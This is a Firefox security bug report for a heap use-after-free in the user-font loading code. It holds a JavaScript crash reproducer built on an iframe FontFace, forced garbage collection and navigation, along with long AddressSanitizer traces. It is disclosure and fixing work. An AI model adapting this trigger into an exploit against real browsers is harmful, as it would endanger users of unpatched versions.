Closed Bug 1559093 Opened 5 years ago Closed 5 years ago

heap-use-after-free in gfxUserFontEntry::LoadPlatformFont

Categories

(Core :: CSS Parsing and Computation, defect)

69 Branch
defect
Not set
normal

Tracking


VERIFIED FIXED
mozilla69
Tracking Status
firefox-esr60 --- unaffected
firefox67 --- unaffected
firefox68 --- unaffected
firefox69 + verified
firefox70 --- verified

People

(Reporter: nils, Assigned: heycam)

References

(Regression)

Details

(Keywords: csectype-uaf, regression, sec-high, Whiteboard: [post-critsmash-triage])

Attachments

(4 files)

The following testcase crashes the latest ASAN build of Firefox 69.0a1 (SourceStamp=4a63f0a3a1f26e2a377ffbd477ba050e16577445). It requires a fuzzing build (--enable-fuzzing) and the pref user_pref("fuzzing.enabled",true). I am using a Python2 webserver (python -m SimpleHTTPServer) to host the testcase. It also requires the attached font file.

crash.html:
<script>
function spin() {
    // Synchronous XHR; Gecko processes pending events while send() blocks.
    var x=new XMLHttpRequest();
    x.open("POST","/post",false);
    try{x.send("X");}catch(e){}
}
function start() {
    o104=document.createElement('iframe');
    document.documentElement.appendChild(o104);
    o444=window.top.frames[0];
    // FontFace constructed in the iframe's window, reference held by the top window.
    o444.eval("window.top.o668=new FontFace('font7',unescape('url%28%27Junction-webfont.eot%27%29'));");
    o668.load();
    spin();
    window.top.setTimeout("window.top.location.href='crash.html'",400);
    o668=null;
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==23262==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800007b520 at pc 0x7fc8b6409910 bp 0x7fff52913cb0 sp 0x7fff52913ca8
READ of size 8 at 0x60800007b520 thread T0 (Web Content)
    #0 0x7fc8b640990f in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15
    #1 0x7fc8b640a8bc in gfxUserFontEntry::ContinuePlatformFontLoadOnMainThread(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:946:17
    #2 0x7fc8b643879f in applyImpl<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByConstLRef<gfxUserFontType>, StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByRRef<nsTArray<nsTString<char> > >, StoreCopyPassByConstLRef<nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> > , 0, 1, 2, 3, 4, 5, 6> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1124:12
    #3 0x7fc8b643879f in apply<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1130
    #4 0x7fc8b643879f in mozilla::detail::RunnableMethodImpl<gfxUserFontEntry*, void (gfxUserFontEntry::*)(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), true, (mozilla::RunnableKind)0, unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> >::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1176
    #5 0x7fc8b274bff3 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1215:14
    #6 0x7fc8b2753db4 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #7 0x7fc8b3b4e32f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #8 0x7fc8b3a2562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #9 0x7fc8b3a2562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #10 0x7fc8b3a2562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #11 0x7fc8bd1260d3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #12 0x7fc8c17673de in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #13 0x7fc8b3a2562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7fc8b3a2562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7fc8b3a2562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7fc8c1765f21 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #17 0x5569d2353eb3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #18 0x5569d2353eb3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #19 0x7fc8d76bcb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #20 0x5569d22753ec in _start (/home/nils/browser/firefox/firefox/firefox+0x453ec)

0x60800007b520 is located 0 bytes inside of 88-byte region [0x60800007b520,0x60800007b578)
freed by thread T0 (Web Content) here:
    #0 0x5569d2320a82 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fc8b2513ca4 in nsCycleCollector::CollectWhite() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3090:26
    #2 0x7fc8b25181b4 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3436:24
    #3 0x7fc8b251d19c in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3949:21
    #4 0x7fc8b7038cdb in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1432:3
    #5 0x7fc8b9a7c1de in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:66:3
    #6 0x7fc8c1a3e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #7 0x7fc8c1a3e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #8 0x7fc8c1a1f238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #9 0x7fc8c1a1f238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #10 0x7fc8c1a0964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #11 0x7fc8c1a3f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #12 0x7fc8c1a41462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #13 0x7fc8c26bf548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
JavaScript error: http://localhost:8000/crash.html, line 5: NetworkError: A network error occurred.
    #14 0x7fc8b9760429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #15 0x7fc8baa524ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #16 0x7fc8baa524ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #17 0x7fc8baa01cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #18 0x7fc8baa03ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #19 0x7fc8ba9e4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #20 0x7fc8ba9e4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #21 0x7fc8ba9e2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #22 0x7fc8ba9e96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #23 0x7fc8bd9d6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #24 0x7fc8c0871053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #25 0x7fc8c087016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #26 0x7fc8c0875b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #27 0x7fc8b5333c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
    #28 0x7fc8b533282a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
    #29 0x7fc8b532ce70 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #30 0x7fc8b53306e5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
    #31 0x7fc8b5332374 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #32 0x7fc8b2a85311 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
    #33 0x7fc8b6c0cbb8 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10534:18
    #34 0x7fc8b6c0cbb8 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10466

previously allocated by thread T0 (Web Content) here:
    #0 0x5569d2320e03 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5569d2355b6d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fc8bd66e925 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:144:10
    #3 0x7fc8bd66e925 in mozilla::dom::FontFaceSet::FontFaceSet(nsPIDOMWindowInner*, mozilla::dom::Document*) /builds/worker/workspace/build/src/layout/style/FontFaceSet.cpp:165
    #4 0x7fc8b6c884e6 in mozilla::dom::Document::Fonts() /builds/worker/workspace/build/src/dom/base/Document.cpp:14613:24
    #5 0x7fc8bd661bef in mozilla::dom::FontFace::Constructor(mozilla::dom::GlobalObject const&, nsTSubstring<char16_t> const&, mozilla::dom::StringOrArrayBufferOrArrayBufferView const&, mozilla::dom::FontFaceDescriptors const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/FontFace.cpp:168:52
    #6 0x7fc8b9a1ae3b in mozilla::dom::FontFace_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FontFaceBinding.cpp:1764:54
    #7 0x7fc8c1a4240d in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #8 0x7fc8c1a4240d in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:464
    #9 0x7fc8c1a4240d in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:657
    #10 0x7fc8c1a1f0fd in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3078:16
    #11 0x7fc8c1a0964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #12 0x7fc8c1a44fcc in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:787:13
    #13 0x7fc8c1b405f1 in EvalKernel(JSContext*, JS::Handle<JS::Value>, EvalType, js::AbstractFramePtr, JS::Handle<JSObject*>, unsigned char*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:326:10
    #14 0x7fc8c1b3fbd8 in js::IndirectEval(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:424:10
    #15 0x7fc8c1a3e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #16 0x7fc8c1a3e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #17 0x7fc8c1a1f238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #18 0x7fc8c1a1f238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #19 0x7fc8c1a0964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #20 0x7fc8c1a3f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #21 0x7fc8c1a41462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #22 0x7fc8c26bf548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
    #23 0x7fc8b9760429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #24 0x7fc8baa524ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #25 0x7fc8baa524ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #26 0x7fc8baa01cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #27 0x7fc8baa03ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #28 0x7fc8ba9e4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #29 0x7fc8ba9e4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #30 0x7fc8ba9e2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #31 0x7fc8ba9e96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #32 0x7fc8bd9d6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #33 0x7fc8c0871053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #34 0x7fc8c087016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #35 0x7fc8c0875b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #36 0x7fc8b5333c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15 in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&)
Shadow bytes around the buggy address:
  0x0c1080007650: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007660: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007670: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1080007680: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007690: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c10800076a0: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
  0x0c10800076b0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c10800076c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c10800076d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c10800076e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c10800076f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==23262==ABORTING
[Parent 22906, Gecko_IOThread] WARNING: pipe error (113): Connection reset by peer: file /builds/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 358
=================================================================
==23329==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000078220 at pc 0x7f480dfd9910 bp 0x7ffd5a7e8f30 sp 0x7ffd5a7e8f28
READ of size 8 at 0x608000078220 thread T0 (Web Content)
    #0 0x7f480dfd990f in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15
    #1 0x7f480dfda8bc in gfxUserFontEntry::ContinuePlatformFontLoadOnMainThread(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:946:17
    #2 0x7f480e00879f in applyImpl<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByConstLRef<gfxUserFontType>, StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByRRef<nsTArray<nsTString<char> > >, StoreCopyPassByConstLRef<nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> > , 0, 1, 2, 3, 4, 5, 6> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1124:12
    #3 0x7f480e00879f in apply<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1130
    #4 0x7f480e00879f in mozilla::detail::RunnableMethodImpl<gfxUserFontEntry*, void (gfxUserFontEntry::*)(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), true, (mozilla::RunnableKind)0, unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> >::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1176
    #5 0x7f480a31bff3 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1215:14
    #6 0x7f480a323db4 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #7 0x7f480b71e32f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #8 0x7f480b5f562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #9 0x7f480b5f562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #10 0x7f480b5f562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #11 0x7f4814cf60d3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #12 0x7f48193373de in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #13 0x7f480b5f562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7f480b5f562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7f480b5f562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7f4819335f21 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #17 0x564c92eadeb3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #18 0x564c92eadeb3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #19 0x7f482f1e4b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #20 0x564c92dcf3ec in _start (/home/nils/browser/firefox/firefox/firefox+0x453ec)

0x608000078220 is located 0 bytes inside of 88-byte region [0x608000078220,0x608000078278)
freed by thread T0 (Web Content) here:
    #0 0x564c92e7aa82 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f480a0e3ca4 in nsCycleCollector::CollectWhite() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3090:26
    #2 0x7f480a0e81b4 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3436:24
    #3 0x7f480a0ed19c in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3949:21
    #4 0x7f480ec08cdb in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1432:3
    #5 0x7f481164c1de in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:66:3
    #6 0x7f481960e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #7 0x7f481960e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #8 0x7f48195ef238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #9 0x7f48195ef238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #10 0x7f48195d964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #11 0x7f481960f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #12 0x7f4819611462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #13 0x7f481a28f548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
    #14 0x7f4811330429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #15 0x7f48126224ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
